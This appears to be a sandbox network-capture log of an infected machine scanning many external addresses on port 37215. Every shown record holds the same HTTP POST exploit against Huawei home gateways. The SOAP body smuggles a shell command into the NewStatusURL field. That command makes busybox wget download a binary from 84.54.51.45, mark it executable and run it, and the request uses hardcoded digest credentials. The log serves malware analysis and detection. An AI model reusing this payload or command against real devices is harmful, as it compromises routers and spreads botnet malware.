2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1069192.168.2.153818641.150.33.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912981033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1070192.168.2.153680041.39.81.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.913517952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1071192.168.2.153703641.178.118.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.913619041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1072192.168.2.155783641.240.214.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.913667917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1073192.168.2.154724841.130.163.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.913667917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1074192.168.2.155071441.241.18.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.914391041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1075192.168.2.155486841.150.47.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.915165901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1076192.168.2.155176441.9.18.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172573090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1077192.168.2.153538641.172.216.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172591925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1078192.168.2.156021441.48.117.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172631979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1079192.168.2.155864441.107.59.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.172657967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
